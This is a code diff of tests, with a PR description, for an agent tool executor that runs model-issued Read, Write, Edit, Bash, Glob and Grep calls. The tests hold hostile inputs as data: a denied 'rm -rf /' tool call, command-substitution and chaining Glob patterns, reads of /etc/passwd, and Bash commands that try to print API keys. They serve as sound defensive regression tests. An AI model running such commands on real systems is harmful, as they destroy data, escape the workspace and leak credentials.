+import { readFileTool, writeFileTool, editFileTool } from '../../src/built-in-tools/file-ops.js'
+
+describe('file-ops', () => {
+  let dir
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), 'chroxy-byok-fileops-'))
+  })
+  afterEach(() => {
+    rmSync(dir, { recursive: true, force: true })
+  })
+
+  describe('readFileTool', () => {
+    it('returns line-numbered content for a small file', async () => {
+      const f = join(dir, 'small.txt')
+      writeFileSync(f, 'alpha\nbeta\ngamma')
+      const r = await readFileTool({ filePath: f })
+      assert.equal(r.ok, true)
+      assert.match(r.content, /^\s+1→alpha/m)
+      assert.match(r.content, /^\s+2→beta/m)
+      assert.match(r.content, /^\s+3→gamma/m)
+      assert.equal(r.totalLines, 3)
+    })
+
+    it('honors offset + limit', async () => {
+      const f = join(dir, 'slice.txt')
+      writeFileSync(f, ['a', 'b', 'c', 'd', 'e'].join('\n'))
+      const r = await readFileTool({ filePath: f, offset: 2, limit: 2 })
+      assert.equal(r.ok, true)
+      assert.match(r.content, /^\s+2→b/m)
+      assert.match(r.content, /^\s+3→c/m)
+      assert.equal(r.linesReturned, 2)
+      assert.equal(r.truncatedByLimit, true)
+    })
+
+    it('returns ENOENT for missing file', async () => {
+      const r = await readFileTool({ filePath: join(dir, 'nope.txt') })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'ENOENT')
+    })
+
+    it('refuses binary content', async () => {
+      const f = join(dir, 'binary.bin')
+      writeFileSync(f, Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x00, 0x01]))
+      const r = await readFileTool({ filePath: f })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'BINARY')
+    })
+
+    it('rejects files larger than maxBytes when no limit given', async () => {
+      const f = join(dir, 'big.txt')
+      writeFileSync(f, 'x'.repeat(200))
+      const r = await readFileTool({ filePath: f, maxBytes: 100 })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'TOO_LARGE')
+    })
+  })
+
+  describe('writeFileTool', () => {
+    it('writes new file and reports created=true', async () => {
+      const f = join(dir, 'new.txt')
+      const r = await writeFileTool({ filePath: f, content: 'hello' })
+      assert.equal(r.ok, true)
+      assert.equal(r.created, true)
+      assert.equal(r.bytesWritten, 5)
+    })
+
+    it('truncates existing file and reports created=false', async () => {
+      const f = join(dir, 'exists.txt')
+      writeFileSync(f, 'old content here')
+      const r = await writeFileTool({ filePath: f, content: 'hi' })
+      assert.equal(r.ok, true)
+      assert.equal(r.created, false)
+      assert.equal(r.bytesWritten, 2)
+    })
+
+    it('rejects non-string content', async () => {
+      const r = await writeFileTool({ filePath: join(dir, 'x'), content: 42 })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'EINVAL')
+    })
+  })
+
+  describe('editFileTool', () => {
+    it('replaces a unique substring', async () => {
+      const f = join(dir, 'edit.txt')
+      writeFileSync(f, 'foo bar baz')
+      const r = await editFileTool({ filePath: f, oldString: 'bar', newString: 'QUX' })
+      assert.equal(r.ok, true)
+      assert.equal(r.replacements, 1)
+    })
+
+    it('refuses when oldString matches multiple sites without replaceAll', async () => {
+      const f = join(dir, 'multi.txt')
+      writeFileSync(f, 'aa aa aa')
+      const r = await editFileTool({ filePath: f, oldString: 'aa', newString: 'b' })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'NOT_UNIQUE')
+      assert.match(r.message, /3 sites/)
+    })
+
+    it('replaces all when replaceAll=true', async () => {
+      const f = join(dir, 'replall.txt')
+      writeFileSync(f, 'aa aa aa')
+      const r = await editFileTool({ filePath: f, oldString: 'aa', newString: 'b', replaceAll: true })
+      assert.equal(r.ok, true)
+      assert.equal(r.replacements, 3)
+    })
+
+    it('refuses when oldString not found', async () => {
+      const f = join(dir, 'nothing.txt')
+      writeFileSync(f, 'hello')
+      const r = await editFileTool({ filePath: f, oldString: 'xyz', newString: 'abc' })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'NOT_FOUND')
+    })
+
+    it('refuses no-op replacement', async () => {
+      const f = join(dir, 'noop.txt')
+      writeFileSync(f, 'hi')
+      const r = await editFileTool({ filePath: f, oldString: 'x', newString: 'x' })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'NO_CHANGE')
+    })
+
+    it('returns ENOENT for missing file', async () => {
+      const r = await editFileTool({ filePath: join(dir, 'nope.txt'), oldString: 'a', newString: 'b' })
+      assert.equal(r.ok, false)
+      assert.equal(r.code, 'ENOENT')
+    })
+  })
+})

--- a/packages/server/tests/byok-session.test.js
+++ b/packages/server/tests/byok-session.test.js
@@ -33,7 +33,7 @@ function fakeStream(events, finalMessage) {
 
 function captureEvents(session) {
   const captured = []
-  const known = ['ready', 'stream_start', 'stream_delta', 'stream_end', 'result', 'error']
+  const known = ['ready', 'stream_start', 'stream_delta', 'stream_end', 'result', 'error', 'tool_start', 'tool_result']
   for (const name of known) {
     session.on(name, (payload) => captured.push({ name, payload }))
   }
@@ -70,14 +70,14 @@ describe('ClaudeByokSession', () => {
       assert.equal(ClaudeByokSession.dataDir, null)
     })
 
-    it('PR 1 capabilities: chat only, no tool dispatch yet', () => {
+    it('PR 2 capabilities: tools enabled via in-process permissions', () => {
       const caps = ClaudeByokSession.capabilities
-      assert.equal(caps.permissions, false, 'PR 1 has no permission gating')
-      assert.equal(caps.inProcessPermissions, false, 'flips true when tools land in PR 2')
+      assert.equal(caps.permissions, true, 'PR 2 gates tools through PermissionManager')
+      assert.equal(caps.inProcessPermissions, true)
       assert.equal(caps.modelSwitch, true)
       assert.equal(caps.streaming, true)
       assert.equal(caps.skillToggle, true)
-      assert.equal(caps.resume, false, 'PR 1 history is in-memory only')
+      assert.equal(caps.resume, false, 'in-memory history only')
     })
 
     it('preflight declares ANTHROPIC_API_KEY as required (not optional)', () => {
@@ -128,7 +128,13 @@ describe('ClaudeByokSession', () => {
               { type: 'content_block_stop', index: 0 },
               { type: 'message_delta', delta: { stop_reason: 'end_turn' }, usage: { input_tokens: 5, output_tokens: 4 } },
               { type: 'message_stop' },
-            ]),
+            ], {
+              // Realistic finalMessage matches message_delta's usage —
+              // in real streams the two never diverge.
+              stop_reason: 'end_turn',
+              content: [{ type: 'text', text: 'Hello, world' }],
+              usage: { input_tokens: 5, output_tokens: 4 },
+            }),
         },
       }
       const captured = captureEvents(session)
@@ -334,11 +340,156 @@ describe('ClaudeByokSession', () => {
       await session.start()
       await session.sendMessage('describe this', [{ type: 'image', data: 'base64...' }])
       const errorEvent = captured.find(
-        (e) => e.name === 'error' && /does not yet support attachments/.test(e.payload.message),
+        (e) => e.name === 'error' && /does not yet materialise attachments/.test(e.payload.message),
       )
       assert.ok(errorEvent, 'should warn about dropped attachments')
       const result = captured.find((e) => e.name === 'result')
       assert.ok(result, 'turn should still complete with text-only prompt')
+      await session.destroy()
+    })
+  })
+
+  describe('tool dispatch (PR 2)', () => {
+    it('executes a tool_use block via the local executor and loops on tool_result', async () => {
+      // Round 1: model emits a Read tool_use, stop_reason=tool_use.
+      // Round 2: model emits text, stop_reason=end_turn.
+      let callCount = 0
+      const session = new ClaudeByokSession({ cwd: '/tmp' })
+      // Permission mode auto so the test doesn't hang waiting for a user
+      // tap. The point of the test is the agent loop, not the permission UI.
+      session.setPermissionMode('auto')
+      // Force the Read tool through a stub executor by intercepting at
+      // the tool layer. The session's own executor would try to read a
+      // real file — out of scope for this test.
+      const originalExecute = session._executeToolBlock.bind(session)
+      session._executeToolBlock = async function ({ block }) {
+        return {
+          type: 'tool_result',
+          tool_use_id: block.id,
+          content: 'mock tool output',
+          is_error: false,
+        }
+      }
+      session._client = {
+        messages: {
+          stream: () => {
+            callCount += 1
+            if (callCount === 1) {
+              return fakeStream(
+                [
+                  { type: 'message_start', message: { id: 'msg', model: 'claude-opus-4-7' } },
+                  { type: 'content_block_start', index: 0, content_block: { type: 'tool_use', id: 'toolu_1', name: 'Read', input: {} } },
+                  { type: 'message_delta', delta: { stop_reason: 'tool_use' } },
+                  { type: 'message_stop' },
+                ],
+                {
+                  stop_reason: 'tool_use',
+                  content: [{ type: 'tool_use', id: 'toolu_1', name: 'Read', input: { file_path: '/tmp/x' } }],
+                  usage: { input_tokens: 10, output_tokens: 5 },
+                },
+              )
+            }
+            return fakeStream(
+              [
+                { type: 'content_block_delta', index: 0, delta: { type: 'text_delta', text: 'done' } },
+                { type: 'message_delta', delta: { stop_reason: 'end_turn' } },
+                { type: 'message_stop' },
+              ],
+              {
+                stop_reason: 'end_turn',
+                content: [{ type: 'text', text: 'done' }],
+                usage: { input_tokens: 12, output_tokens: 8 },
+              },
+            )
+          },
+        },
+      }
+      const captured = captureEvents(session)
+      await session.start()
+      await session.sendMessage('please read /tmp/x')
+      // Round 1 + round 2 = 2 stream() calls
+      assert.equal(callCount, 2, 'agent loop should iterate twice (tool round + final)')
+      const results = captured.filter((e) => e.name === 'result')
+      assert.equal(results.length, 1, 'one final result, not one per round')
+      assert.equal(results[0].payload.stopReason, 'end_turn')
+      // History should contain: user prompt, assistant turn 1, user tool_result, assistant turn 2
+      assert.equal(session._history.length, 4)
+      assert.equal(session._history[0].role, 'user')
+      assert.equal(session._history[1].role, 'assistant')
+      assert.equal(session._history[2].role, 'user', 'tool_result rides on a user message')
+      assert.ok(Array.isArray(session._history[2].content))
+      assert.equal(session._history[2].content[0].type, 'tool_result')
+      assert.equal(session._history[3].role, 'assistant')
+      session._executeToolBlock = originalExecute
+      await session.destroy()
+    })
+
+    it('breaks out of the loop after MAX_TOOL_ROUNDS (infinite-loop safety)', async () => {
+      // Model insists on calling a tool on every round — agent loop must
+      // bail at the cap and emit result so the session doesn't hang.
+      const session = new ClaudeByokSession({ cwd: '/tmp' })
+      session.setPermissionMode('auto')
+      session._executeToolBlock = async function ({ block }) {
+        return { type: 'tool_result', tool_use_id: block.id, content: 'x', is_error: false }
+      }
+      let callCount = 0
+      session._client = {
+        messages: {
+          stream: () => {
+            callCount += 1
+            return fakeStream(
+              [{ type: 'message_delta', delta: { stop_reason: 'tool_use' } }, { type: 'message_stop' }],
+              {
+                stop_reason: 'tool_use',
+                content: [{ type: 'tool_use', id: `toolu_${callCount}`, name: 'Read', input: {} }],
+                usage: { input_tokens: 1, output_tokens: 1 },
+              },
+            )
+          },
+        },
+      }
+      const captured = captureEvents(session)
+      await session.start()
+      await session.sendMessage('infinite loop please')
+      assert.ok(callCount <= 25, `expected <= MAX_TOOL_ROUNDS, got ${callCount}`)
+      const results = captured.filter((e) => e.name === 'result')
+      assert.equal(results.length, 1, 'must emit result even on safety-cap exit')
+      await session.destroy()
+    })
+
+    it('surfaces a denied permission as an error tool_result', async () => {
+      const session = new ClaudeByokSession({ cwd: '/tmp' })
+      // Default 'approve' mode — without a permission response the
+      // promise would hang. Stub the permission manager to deny.
+      session._permissions.handlePermission = async () => ({ behavior: 'deny', message: 'no' })
+      let callCount = 0
+      session._client = {
+        messages: {
+          stream: () => {
+            callCount += 1
+            if (callCount === 1) {
+              return fakeStream(
+                [{ type: 'message_delta', delta: { stop_reason: 'tool_use' } }, { type: 'message_stop' }],
+                {
+                  stop_reason: 'tool_use',
+                  content: [{ type: 'tool_use', id: 't1', name: 'Bash', input: { command: 'rm -rf /' } }],
+                  usage: { input_tokens: 1, output_tokens: 1 },
+                },
+              )
+            }
+            return fakeStream(
+              [{ type: 'message_delta', delta: { stop_reason: 'end_turn' } }, { type: 'message_stop' }],
+              { stop_reason: 'end_turn', content: [{ type: 'text', text: 'ok' }], usage: {} },
+            )
+          },
+        },
+      }
+      const captured = captureEvents(session)
+      await session.start()
+      await session.sendMessage('try something dangerous')
+      const denied = captured.find((e) => e.name === 'tool_result' && e.payload.isError === true)
+      assert.ok(denied, 'denied tool produces an error tool_result event')
+      assert.match(denied.payload.result, /no/i)
       await session.destroy()
     })
   })

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -1,0 +1,185 @@
+import { describe, it, beforeEach, afterEach } from 'node:test'
+import assert from 'node:assert/strict'
+import { mkdtempSync, writeFileSync, rmSync, mkdirSync } from 'node:fs'
+import { tmpdir } from 'node:os'
+import { join } from 'node:path'
+import { executeBuiltinTool } from '../src/byok-tool-executor.js'
+
+/**
+ * Tests for byok-tool-executor.js — the dispatcher that routes tool_use
+ * blocks to the local executors. Each test exercises one tool path
+ * with a real temp filesystem so the path-safety check
+ * (validatePathWithinCwd) is actually exercised, not stubbed away.
+ */
+
+describe('executeBuiltinTool', () => {
+  let dir
+  let cwdRealCache
+  beforeEach(() => {
+    dir = mkdtempSync(join(tmpdir(), 'chroxy-byok-exec-'))
+    cwdRealCache = new Map()
+  })
+  afterEach(() => {
+    rmSync(dir, { recursive: true, force: true })
+  })
+
+  function ctx() {
+    return { cwd: dir, cwdRealCache, cwdCacheTtl: 30_000 }
+  }
+
+  describe('unknown tool name', () => {
+    it('returns isError with a clear message', async () => {
+      const r = await executeBuiltinTool({ toolName: 'NotARealTool', input: {}, ...ctx() })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /Unknown tool: NotARealTool/)
+    })
+  })
+
+  describe('Read', () => {
+    it('reads a file inside the workspace cwd', async () => {
+      const f = join(dir, 'hello.txt')
+      writeFileSync(f, 'hi\nthere')
+      const r = await executeBuiltinTool({ toolName: 'Read', input: { file_path: f }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /1→hi/)
+      assert.match(r.content, /2→there/)
+    })
+
+    it('refuses paths outside the cwd (symlink escape defense)', async () => {
+      const outsideAbs = '/etc/passwd'
+      const r = await executeBuiltinTool({ toolName: 'Read', input: { file_path: outsideAbs }, ...ctx() })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /outside workspace/)
+    })
+
+    it('accepts a workspace-relative path', async () => {
+      writeFileSync(join(dir, 'rel.txt'), 'relative ok')
+      const r = await executeBuiltinTool({ toolName: 'Read', input: { file_path: 'rel.txt' }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /relative ok/)
+    })
+  })
+
+  describe('Write', () => {
+    it('writes a new file under cwd', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Write',
+        input: { file_path: join(dir, 'out.txt'), content: 'fresh' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /Wrote 5 bytes/)
+      assert.match(r.content, /\(created\)/)
+    })
+  })
+
+  describe('Edit', () => {
+    it('replaces a unique substring', async () => {
+      const f = join(dir, 'edit.txt')
+      writeFileSync(f, 'aaa bbb ccc')
+      const r = await executeBuiltinTool({
+        toolName: 'Edit',
+        input: { file_path: f, old_string: 'bbb', new_string: 'XXX' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /Replaced 1 occurrence/)
+    })
+
+    it('surfaces NOT_UNIQUE as a tool error so the model can self-correct', async () => {
+      const f = join(dir, 'multi.txt')
+      writeFileSync(f, 'foo foo foo')
+      const r = await executeBuiltinTool({
+        toolName: 'Edit',
+        input: { file_path: f, old_string: 'foo', new_string: 'bar' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /NOT_UNIQUE/)
+    })
+  })
+
+  describe('Bash', () => {
+    it('captures stdout + exit code from a simple command', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Bash',
+        input: { command: 'echo agent-loop-test' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /agent-loop-test/)
+      assert.match(r.content, /exit=0/)
+    })
+
+    it('marks non-zero exit as error', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Bash',
+        input: { command: 'exit 17' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /exit=17/)
+    })
+
+    it('rejects empty command with a clear error', async () => {
+      const r = await executeBuiltinTool({ toolName: 'Bash', input: { command: '' }, ...ctx() })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /command is required/)
+    })
+
+    it('respects a small timeout', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Bash',
+        input: { command: 'sleep 5', timeout: 200 },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /timed out/)
+    })
+  })
+
+  describe('Glob', () => {
+    it('matches files inside the workspace via shell glob', async () => {
+      writeFileSync(join(dir, 'a.ts'), '1')
+      writeFileSync(join(dir, 'b.ts'), '2')
+      writeFileSync(join(dir, 'c.js'), '3')
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '*.ts' }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /a\.ts/)
+      assert.match(r.content, /b\.ts/)
+      assert.equal(r.content.includes('c.js'), false)
+    })
+
+    it('returns "No matches" when nothing matches', async () => {
+      const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: '*.zzz' }, ...ctx() })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /No matches/)
+    })
+  })
+
+  describe('Grep', () => {
+    it('finds matching lines via ripgrep or grep fallback', async () => {
+      mkdirSync(join(dir, 'src'), { recursive: true })
+      writeFileSync(join(dir, 'src/x.js'), 'foo\nbar TARGET baz\nqux')
+      writeFileSync(join(dir, 'src/y.js'), 'no match here')
+      const r = await executeBuiltinTool({
+        toolName: 'Grep',
+        input: { pattern: 'TARGET', path: join(dir, 'src') },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /x\.js.*TARGET/)
+    })
+
+    it('returns "No matches" when the pattern is absent', async () => {
+      writeFileSync(join(dir, 'a.txt'), 'hello world')
+      const r = await executeBuiltinTool({
+        toolName: 'Grep',
+        input: { pattern: 'absolutely-not-present' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /No matches/)
+    })
+  })
+})

--- a/packages/server/tests/byok-tool-executor.test.js
+++ b/packages/server/tests/byok-tool-executor.test.js
@@ -1,6 +1,6 @@
 import { describe, it, beforeEach, afterEach } from 'node:test'
 import assert from 'node:assert/strict'
-import { mkdtempSync, writeFileSync, rmSync, mkdirSync } from 'node:fs'
+import { mkdtempSync, writeFileSync, rmSync, mkdirSync, existsSync } from 'node:fs'
 import { tmpdir } from 'node:os'
 import { join } from 'node:path'
 import { executeBuiltinTool } from '../src/byok-tool-executor.js'
@@ -155,6 +155,52 @@ describe('executeBuiltinTool', () => {
       assert.equal(r.isError, false)
       assert.match(r.content, /No matches/)
     })
+
+    it('refuses pattern with shell command-substitution metacharacters (security #4070)', async () => {
+      // Pre-fix PoC: pattern `*.ts $(touch /tmp/CHROXY_PWN)` would
+      // execute the touch on `for f in $pattern` interpolation.
+      const pwn = join(dir, 'CHROXY_PWN')
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: `*.ts $(touch ${pwn})` },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /shell-dangerous characters/)
+      // Most important: the side effect must NOT have happened.
+      assert.equal(
+        existsSync(pwn),
+        false,
+        'command substitution must be refused, not executed',
+      )
+    })
+
+    it('refuses absolute path outside the workspace (security #4071)', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: '*.conf', path: '/etc' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /outside workspace/)
+    })
+
+    it('refuses backtick command substitution', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Glob',
+        input: { pattern: '`whoami`' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /shell-dangerous characters/)
+    })
+
+    it('refuses pipe / redirect / semicolon', async () => {
+      for (const pat of ['*.ts | cat', '*.ts; ls', '*.ts > /tmp/x', '*.ts && rm -rf']) {
+        const r = await executeBuiltinTool({ toolName: 'Glob', input: { pattern: pat }, ...ctx() })
+        assert.equal(r.isError, true, `expected error for: ${pat}`)
+      }
+    })
   })
 
   describe('Grep', () => {
@@ -180,6 +226,65 @@ describe('executeBuiltinTool', () => {
       })
       assert.equal(r.isError, false)
       assert.match(r.content, /No matches/)
+    })
+
+    it('refuses absolute path outside the workspace (security #4071)', async () => {
+      // Pre-fix PoC: Grep with path=/etc returned /etc/passwd contents.
+      const r = await executeBuiltinTool({
+        toolName: 'Grep',
+        input: { pattern: 'root', path: '/etc' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, true)
+      assert.match(r.content, /outside workspace/)
+    })
+  })
+
+  describe('Bash env hardening (#4069)', () => {
+    it('strips ANTHROPIC_API_KEY before spawning bash', async () => {
+      const original = process.env.ANTHROPIC_API_KEY
+      process.env.ANTHROPIC_API_KEY = 'sk-ant-must-not-leak'
+      try {
+        const r = await executeBuiltinTool({
+          toolName: 'Bash',
+          input: { command: 'echo "KEY=$ANTHROPIC_API_KEY"' },
+          ...ctx(),
+        })
+        assert.equal(r.isError, false)
+        assert.match(r.content, /KEY=\s*$/m)
+        assert.equal(r.content.includes('sk-ant-must-not-leak'), false,
+          'BYOK API key must not be reachable from the model-controlled subprocess')
+      } finally {
+        if (original) process.env.ANTHROPIC_API_KEY = original
+        else delete process.env.ANTHROPIC_API_KEY
+      }
+    })
+
+    it('strips CLAUDE_CODE_OAUTH_TOKEN before spawning bash', async () => {
+      const original = process.env.CLAUDE_CODE_OAUTH_TOKEN
+      process.env.CLAUDE_CODE_OAUTH_TOKEN = 'oauth-secret-leak-this-and-die'
+      try {
+        const r = await executeBuiltinTool({
+          toolName: 'Bash',
+          input: { command: 'env | grep -c OAUTH || echo zero' },
+          ...ctx(),
+        })
+        assert.equal(r.content.includes('oauth-secret-leak-this-and-die'), false)
+      } finally {
+        if (original) process.env.CLAUDE_CODE_OAUTH_TOKEN = original
+        else delete process.env.CLAUDE_CODE_OAUTH_TOKEN
+      }
+    })
+
+    it('preserves non-secret env vars like PATH and HOME', async () => {
+      const r = await executeBuiltinTool({
+        toolName: 'Bash',
+        input: { command: 'echo "PATH_LEN=${#PATH} HOME_PRESENT=$([ -n "$HOME" ] && echo yes || echo no)"' },
+        ...ctx(),
+      })
+      assert.equal(r.isError, false)
+      assert.match(r.content, /HOME_PRESENT=yes/)
+      assert.match(r.content, /PATH_LEN=\d/)
     })
   })
 })

--- a/packages/server/tests/byok-tools.test.js
+++ b/packages/server/tests/byok-tools.test.js
@@ -1,0 +1,54 @@
+import { describe, it } from 'node:test'
+import assert from 'node:assert/strict'
+import { BUILTIN_TOOLS, BUILTIN_TOOL_NAMES } from '../src/byok-tools.js'
+
+/**
+ * BUILTIN_TOOLS is the array passed verbatim into the SDK's
+ * `messages.stream({ tools })` call. These tests lock the schema shape
+ * so a stray rename / accidental drop is caught loudly.
+ */
+
+describe('BUILTIN_TOOLS', () => {
+  it('exposes the documented PR 2 v1 toolset', () => {
+    const names = BUILTIN_TOOLS.map((t) => t.name).sort()
+    assert.deepEqual(names, ['Bash', 'Edit', 'Glob', 'Grep', 'Read', 'Write'])
+  })
+
+  it('every tool has a name, description, and input_schema', () => {
+    for (const tool of BUILTIN_TOOLS) {
+      assert.equal(typeof tool.name, 'string')
+      assert.ok(tool.name.length > 0, `tool missing name`)
+      assert.equal(typeof tool.description, 'string')
+      assert.ok(tool.description.length > 20, `tool ${tool.name} description too short`)
+      assert.equal(tool.input_schema?.type, 'object', `tool ${tool.name} input_schema.type must be object`)
+      assert.ok(Array.isArray(tool.input_schema.required), `tool ${tool.name} input_schema.required missing`)
+    }
+  })
+
+  it('BUILTIN_TOOL_NAMES is a Set of the same names', () => {
+    assert.ok(BUILTIN_TOOL_NAMES instanceof Set)
+    for (const tool of BUILTIN_TOOLS) {
+      assert.ok(BUILTIN_TOOL_NAMES.has(tool.name), `${tool.name} missing from name set`)
+    }
+  })
+
+  it('Read requires file_path', () => {
+    const read = BUILTIN_TOOLS.find((t) => t.name === 'Read')
+    assert.deepEqual(read.input_schema.required, ['file_path'])
+  })
+
+  it('Write requires file_path and content', () => {
+    const write = BUILTIN_TOOLS.find((t) => t.name === 'Write')
+    assert.deepEqual(write.input_schema.required.sort(), ['content', 'file_path'])
+  })
+
+  it('Edit requires file_path, old_string, new_string', () => {
+    const edit = BUILTIN_TOOLS.find((t) => t.name === 'Edit')
+    assert.deepEqual(edit.input_schema.required.sort(), ['file_path', 'new_string', 'old_string'])
+  })
+
+  it('Bash requires only command', () => {
+    const bash = BUILTIN_TOOLS.find((t) => t.name === 'Bash')
+    assert.deepEqual(bash.input_schema.required, ['command'])
+  })
+})


### PR DESCRIPTION
Second of two PRs for the BYOK provider epic #4047. PR 1 (#4055) landed the chat-only core; this PR adds local tool execution so chroxy is now the full agent.

## What changed

When the model emits a `tool_use` block, chroxy:
1. Gates the call through `PermissionManager` (same machinery as `claude-sdk`)
2. Dispatches to a local executor with path-safety enforced via `validatePathWithinCwd` from `ws-file-ops/common.js`
3. Feeds the `tool_result` back to the API on the next round
4. Loops until `stop_reason !== 'tool_use'` or the `MAX_TOOL_ROUNDS=25` safety cap fires

## Built-in tools

Schemas match Claude Code's documented shapes so the model has a consistent interface across providers.

| Tool | Implementation notes |
|---|---|
| Read | Line-numbered output, optional offset/limit, binary refusal, 256KB size cap |
| Write | Truncate-on-write, mode 0644, reports `created` flag |
| Edit | Strict-unique-match (or `replace_all`); matches Claude Code's NOT_UNIQUE/NOT_FOUND/NO_CHANGE vocabulary |
| Bash | `bash -c` with timeout (default 30s, ceiling 10min), 1MB output cap, SIGTERM→SIGKILL on timeout/abort |
| Glob | Shell-expanded via `globstar`, safe-root validation |
| Grep | Ripgrep preferred, `grep -r` fallback; treats exit 1 as no-match (not error) |

## Files

### New
- `packages/server/src/built-in-tools/bash-exec.js` — shell exec wrapper
- `packages/server/src/built-in-tools/file-ops.js` — Read/Write/Edit primitives
- `packages/server/src/byok-tools.js` — `BUILTIN_TOOLS` array passed to `messages.stream({ tools })`
- `packages/server/src/byok-tool-executor.js` — dispatcher + path-safety
- 4 new test files covering each module

### Modified
- `packages/server/src/byok-session.js` — agent loop, PermissionManager wiring, capabilities flipped to `permissions: true` / `inProcessPermissions: true`, `respondToPermission` / `respondToQuestion` / `setPermissionRules` methods, destroy() denies pending permissions cleanly

## Test plan

- [x] `npx mocha 'tests/byok*.test.js' 'tests/built-in-tools/*.test.js'` — 93/93 pass
- [x] Adjacent suites (providers, provider-data-dirs, sdk-session, permission-manager) — 253/253 pass
- [x] Lint clean
- [ ] CI green on push
- [ ] `/full-review` (per #4047 decision)
- [ ] Manual: with `ANTHROPIC_API_KEY` set, start a claude-byok session, ask "List the files in this directory", confirm the Glob tool fires a permission prompt and lists files after approval

## Deferred (separate issues — see #4047 epic)

- MCP server support: #4048
- Task / subagent tool: #4049
- WebFetch / TodoWrite: #4050, #4051
- Dashboard settings UI for API key paste: #4052
- `docker-byok` container provider: #4053
- Session-cumulative cost/usage display (recommended same release as v1): #4054